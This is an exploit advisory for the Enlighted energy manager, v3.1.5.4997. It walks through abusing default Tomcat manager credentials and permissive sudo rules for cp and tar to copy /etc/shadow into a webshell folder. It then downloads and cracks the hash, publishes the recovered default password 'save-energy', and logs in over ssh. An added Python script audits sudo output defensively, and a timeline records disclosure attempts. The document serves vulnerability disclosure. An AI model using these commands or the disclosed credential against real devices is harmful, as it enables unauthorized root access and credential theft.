# Exploit Title: Enlighted v 3.1.5.4997
# Date: 10-02-2016
# Exploit Author: BrianWGray
# Contact: https://twitter.com/BrianWGray
# Vendor Homepage: http://www.enlightedinc.com/
# Software Link: http://www.enlightedinc.com/system-and-solutions/iot-system/energy-manager/
# Version: ?~<v 3.1.5.4997 through ?
# Tested on: v 3.1.5.4997
# CVE : N/A

TODO: Improve Writeup

Enlighted v 3.1.5.4997 

Default tomcat manager credential

Command: sudo -l

Matching Defaults entries for tomcat6 on this host:
    env_reset

User tomcat6 may run the following commands on this host:
(root) NOPASSWD: /bin/cp, (root) /bin/ls, (root) /bin/tar,
(root) /usr/bin/dpkg, (root) /usr/bin/tee, (root) /usr/sbin/dpkg-reconfigure,
(root) /etc/init.d/networking, (root) /bin/date, (root) /etc/init.d/tomcat6,
(root) /etc/init.d/dhcp3-server, (root) /sbin/ifup, (root) /sbin/ifdown,
(root) /usr/bin/killall

Using the ability to run cp and tar with sudo, I made a tar bundle of the /etc/shadow file, without preserving permissions, that could be read as tomcat6.
sudo cp /etc/shadow ./webapps/cmd/
sudo tar cf ./webapps/cmd/shadow.tar --mode=a+rwX ./webapps/cmd/shadow 
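
The sudo rules quoted above are what made the shadow copy possible. As an added example (not from the advisory), the following Python check parses `sudo -l` output and flags NOPASSWD root entries for binaries that can read or write arbitrary files; the FILE_ACCESS_BINARIES list is an assumption, and the sample input is the tomcat6 output quoted above.

```python
"""Audit `sudo -l` output for service accounts allowed to copy or archive
arbitrary files as root. Added example, not part of the original advisory."""
import re

# Binaries that read or overwrite arbitrary files when run as root. This
# is a hypothetical starting list; cp and tar are the two used in the writeup.
FILE_ACCESS_BINARIES = {"/bin/cp", "/bin/tar", "/usr/bin/tee", "/usr/bin/dpkg"}

# The tomcat6 rules quoted in the advisory, embedded as sample input.
SAMPLE_SUDO_L = """Matching Defaults entries for tomcat6 on this host:
    env_reset

User tomcat6 may run the following commands on this host:
    (root) NOPASSWD: /bin/cp, (root) /bin/ls, (root) /bin/tar,
    (root) /usr/bin/dpkg, (root) /usr/bin/tee, (root) /usr/sbin/dpkg-reconfigure,
    (root) /etc/init.d/networking, (root) /bin/date, (root) /etc/init.d/tomcat6,
    (root) /etc/init.d/dhcp3-server, (root) /sbin/ifup, (root) /sbin/ifdown,
    (root) /usr/bin/killall
"""

def parse_sudo_l(text):
    """Return (runas, nopasswd, command) tuples from `sudo -l` output.
    sudo prints a NOPASSWD:/PASSWD: tag once and it stays in effect for the
    commands that follow in the same list, so the tag is carried forward."""
    body, in_commands = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_commands = True
        elif in_commands and line.strip():
            body.append(line.strip())
    entries, runas, nopasswd = [], "root", False
    for item in " ".join(body).split(","):
        item = item.strip()
        if not item:
            continue
        m = re.match(r"^\(([^)]*)\)\s*(.*)$", item)  # optional "(root) " prefix
        if m:
            runas, item = m.group(1), m.group(2)
        tag = re.match(r"^(NOPASSWD|PASSWD):\s*(.*)$", item)
        if tag:
            nopasswd, item = tag.group(1) == "NOPASSWD", tag.group(2)
        entries.append((runas, nopasswd, item.strip()))
    return entries

def risky_entries(entries):
    """Entries granting root, without a password, on a file-access binary."""
    return [e for e in entries
            if e[1] and e[0] in ("root", "ALL") and e[2]
            and e[2].split()[0] in FILE_ACCESS_BINARIES]
```

Run it against the real output of `sudo -l -U <account>` for each service account; any hit means that account can read or replace files such as /etc/shadow as root.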

I downloaded the shadow file to crack offline.

The hash is sha512crypt which isn’t a hash type I get great cracking speeds on so it took a few minutes.

wget https://x.x.x.x/cmd/shadow.tar
 

I didn't do any targeted cracking and let it run for a while using crackstation-human-only.txt: https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm

$6$D9BfPiuR$jhbcZkSn/c2F1LXZiicP7.LCUsDosNX.XCEPWP8Fdq54ewdTZFHS7uBMjqzvnz9ek2tG.Wd7nzDmDz3ZyWRWX.:save-energy

ssh enlighted@x.x.x.x 
password:save-energy

--

ssh enlighted@x.x.x.x
enlighted@x.x.x.x's password:
Linux enlightedinc-448a5b3a6276 2.6.32-24-generic #39-Ubuntu SMP Wed Jul 28 06:07:29 UTC 2010 i686 GNU/Linux

Ubuntu 10.04.1 LTS
Welcome to Ubuntu!

* Documentation:  https://help.ubuntu.com/

0 packages can be updated.
0 updates are security updates.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

--
I had also downloaded the .ssh/id_rsa_openssh private key from the enlighted user’s home directory via the tomcat6 user as they were world readable but it doesn’t seem to match the authorized host file for the user.


Command: ls -la /home/enlighted/.ssh

total 16
drwxr-xr-x  2 enlighted enlighted 4096 2014-05-07 01:13 .
drwxr-xr-x 31 enlighted enlighted 4096 2014-08-16 02:59 ..
-rw-r--r--  1 enlighted enlighted  604 2014-05-05 22:03 authorized_keys
-rwxr-xr-x  1 enlighted enlighted  899 2014-05-05 22:03 id_rsa_openssh

Command: cat /home/enlighted/.ssh/id_rsa_openssh 

-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----

Command: cat /home/enlighted/.ssh/authorized_keys

ssh-dss [public key material removed] root@enlighted

Command: cat /etc/lsb-release

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=10.04
DISTRIB_CODENAME=lucid
DISTRIB_DESCRIPTION="Ubuntu 10.04.1 LTS"

Command: uname -a

Linux enlightedinc-448a5b3a6276 2.6.32-24-generic #39-Ubuntu SMP Wed Jul 28 06:07:29 UTC 2010 i686 GNU/Linux

Timeline:

* 04-20-2015: Discovered default tomcat manager credentials. The vendor was unwilling to assist in remediation.
* Multiple undocumented assistance requests.
* 09-28-2016: Re-contacted the vendor for assistance to change the credentials; the vendor declined assistance without paying for service.
* 09-28-2016: Discovered insecure sudo configuration for the tomcat6 user; used the webshell to download /etc/shadow.
* 10-01-2016: Default enlighted account credential cracked, allowing remote ssh + root. Vendor not currently notified.
